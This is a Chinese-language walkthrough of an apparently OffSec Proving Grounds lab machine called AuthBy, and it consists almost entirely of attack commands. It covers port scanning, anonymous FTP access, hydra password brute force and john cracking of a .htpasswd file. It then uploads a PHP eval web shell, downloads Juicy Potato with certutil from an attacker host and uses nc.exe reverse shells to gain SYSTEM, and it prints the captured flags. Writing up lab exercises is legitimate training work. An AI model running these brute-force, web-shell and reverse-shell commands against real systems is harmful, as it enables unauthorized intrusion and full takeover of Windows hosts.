Intermediate-AuthBy

目标：

192.168.205.46

信息收集：

./rustscan -a 192.168.205.46 --scripts none -r 1-65535

 

nmap -p21,242,3389 -A -v -Pn 192.168.205.46

 

 

Cat flag-local.txt：

ftp anonymous@192.168.205.46 #密码：anonymous

 

 

收集到账号：offsec、admin、anonymous，使用hydra爆破一下：

hydra -l admin -p admin 192.168.205.46 ftp

 

 

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.205.46 ftp

ftp admin@192.168.205.46  #密码：admin

 

 

get .htpasswd /home/kali/Desktop/htpasswd

 

 

john --wordlist=/usr/share/wordlists/rockyou.txt htpasswd

 

继续下载index.php，无可用信息，但是之前发现的offsec的账号密码可以用来登录242端口，发现是index.php的内容：

 

 

由此我们可以写入两个php，上传到对应的ftp目录内：

<?php
 @eval($_POST['cmd']);
 ?>

 

put /home/kali/Desktop/cmd.php cmd.php

 

 上传成功，蚁剑也成功连接，注意，要添加header凭证：

 

 

 

  005bd6645d5be60038527f43f9a546eb

Cat flag-proof.txt：

whoami /priv

 

 可以直接使用多汁土豆提权，下载网址：https://github.com/ivanitlearning/Juicy-Potato-x86，（这里上传x64位是报错的，所以要上传x86，即32位），如果上传不成功，则可以用以下命令进行上传：

certutil -urlcache -split -f http://192.168.45.201/Ju.exe  Ju.exe

 

上传nc.exe

本地开启监听：

Ju.exe  -t  * -p nc.exe -a "192.168.45.201 9998 -e c:\windows\system32\cmd.exe" #先运行这个
Ju.exe -l 4444 -p nc.exe -a "192.168.45.201 9998 -e c:\windows\system32\cmd.exe" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}#然后获取到对应的值再运行这个，记得替换-c后面的参数
nc -lvp 9998 #本地开启监听

 

 

C:\>type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\Administrator\Desktop\proof.txt
ff13de537931eed06f1f68740aa96c21

C:\>